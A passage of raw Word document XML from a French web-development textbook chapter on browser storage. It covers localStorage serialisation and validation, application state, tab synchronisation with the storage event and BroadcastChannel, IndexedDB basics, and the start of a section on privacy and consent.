        <w:t>document.cookie = "langue=fr; path=/; max-age=31536000; SameSite=Lax";</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QUOTA</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Limite d'espace allouée à une origine. Elle dépend du navigateur et de l'espace disque. Un dépassement lève une exception </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>QuotaExceededError</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>31.2 Sérialiser avec précaution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne stocke que des chaînes. Il faut donc sérialiser les objets, et surtout prévoir le cas d'une donnée absente, corrompue ou incompatible avec la version actuelle du code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une lecture qui ne casse jamais l'interface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function lire(cle, defaut) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const brut = localStorage.getItem(cle);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (brut === null) return defaut;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const enveloppe = JSON.parse(brut);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (enveloppe.version !== VERSION) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      localStorage.removeItem(cle);      // migration impossible</w:t>
        <w:br/>
        <w:t xml:space="preserve">      return defaut;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return enveloppe.valeur;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  } catch {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return defaut;                        // JSON corrompu</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>function ecrire(cle, valeur) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    localStorage.setItem(cle, JSON.stringify({ version: VERSION, valeur }));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  } catch (e) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (e.name === "QuotaExceededError") console.warn("Stockage plein");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</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NE FAITES JAMAIS CONFIANCE AU STOCKAGE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">L'utilisateur peut modifier </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>localStorage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> depuis la console. Une valeur relue doit être validée comme n'importe quelle donnée externe : type, longueur, plage autorisée.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une liste blanche plutôt qu'une confiance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Validation d'une préférence relue</w:t>
        <w:br/>
        <w:t>const THEMES = new Set(["clair", "sombre", "auto"]);</w:t>
        <w:br/>
        <w:t>function appliquerTheme(valeur) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const theme = THEMES.has(valeur) ? valeur : "auto";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  document.documentElement.dataset.theme = theme;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>31.3 Un état unique et prévisible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Quand plusieurs zones de l'interface dépendent de la même donnée, la dupliquer dans le DOM produit des incohérences. Un objet d'état unique, modifié par des fonctions, puis rendu, évite ces dérives.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3111500"/>
            <wp:docPr id="41" name="Picture 41"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f39.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3111500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.39 — Un cycle d'état simple</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un état, un rendu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const etat = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  filtres: { theme: "tous", recherche: "" },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  articles: [],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  chargement: false,</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:br/>
        <w:t>function definirFiltre(cle, valeur) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  etat.filtres[cle] = valeur;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  rendre();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  persister();</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>function rendre() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const visibles = etat.articles.filter(a =&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    etat.filtres.theme === "tous" || a.theme === etat.filtres.theme</w:t>
        <w:br/>
        <w:t xml:space="preserve">  );</w:t>
        <w:br/>
        <w:t xml:space="preserve">  liste.replaceChildren(...visibles.map(carteArticle));</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.97 — Cinq natures d'état et leur emplacement</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5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Type d'état</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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Où</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Préférence durable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>localStorage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Thème, langue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>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État de session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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sessionStorage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Étape d'un tunnel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Données volumineuses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>IndexedDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Brouillons hors ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>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État éphémère</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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Mémoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Menu ouvert, recherche</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>État d'URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Adresse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Filtres partageables</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L'URL EST UN ÉTAT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Placer les filtres dans la chaîne de requête rend une vue partageable et compatible avec le bouton Retour. C'est souvent le meilleur choix pour une liste filtrée.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>31.4 Synchroniser les onglets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'événement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>storage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se déclenche dans les autres onglets de la même origine lorsqu'une valeur change. C'est le moyen le plus simple de garder les sessions cohérentes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un thème synchronisé partout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window.addEventListener("storage", (evenement) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (evenement.key === "theme") {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    appliquerTheme(evenement.newValue);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (evenement.key === "deconnexion") {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    window.location.reload();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Se déclenche dans les autres onglets, jamais dans celui qui écrit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour des données plus complexes, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>BroadcastChannel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> transmet des messages structurés entre onglets, sans passer par le stockage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un canal direct entre onglets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const canal = new BroadcastChannel("panier");</w:t>
        <w:br/>
        <w:t>canal.postMessage({ type: "ajout", articleId: 42 });</w:t>
        <w:br/>
        <w:br/>
        <w:t>canal.addEventListener("message", (e) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (e.data.type === "ajout") mettreAJourPanier(e.data.articleId);</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>31.5 IndexedDB en pratique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IndexedDB stocke des objets structurés, y compris des fichiers. Son API est asynchrone et verbeuse ; on l'utilise via une petite enveloppe ou une bibliothèque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une base minimale, versionnée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function ouvrirBase() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return new Promise((resoudre, rejeter) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const requete = indexedDB.open("mon-site", 2);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    requete.onupgradeneeded = () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      const base = requete.result;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      if (!base.objectStoreNames.contains("brouillons")) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        base.createObjectStore("brouillons", { keyPath: "id" });</w:t>
        <w:br/>
        <w:t xml:space="preserve">      }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    };</w:t>
        <w:br/>
        <w:t xml:space="preserve">    requete.onsuccess = () =&gt; resoudre(requete.result);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    requete.onerror = () =&gt; rejeter(requete.error);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>async function sauver(brouillon) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const base = await ouvrirBase();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const tx = base.transaction("brouillons", "readwrite");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tx.objectStore("brouillons").put(brouillon);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return new Promise((ok, ko) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    tx.oncomplete = ok;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    tx.onerror = () =&gt; ko(tx.error);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La version de la base déclenche </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>onupgradeneeded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : c'est là que se définissent les migrations. Une base qui change de structure sans migration perd ses données ou provoque une erreur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>31.6 Vie privée et consentement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un stockage local n'est pas neutre : il permet de reconnaître un visiteur. En Europe, les traceurs non essentiels exigent un consentement préalable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.98 — Cinq usages et leur régime de consentement</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05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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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Consentement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
